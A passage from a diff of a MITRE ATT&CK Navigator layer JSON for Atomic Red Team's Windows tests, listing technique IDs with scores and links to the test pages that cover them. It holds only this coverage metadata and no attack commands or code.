tomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/m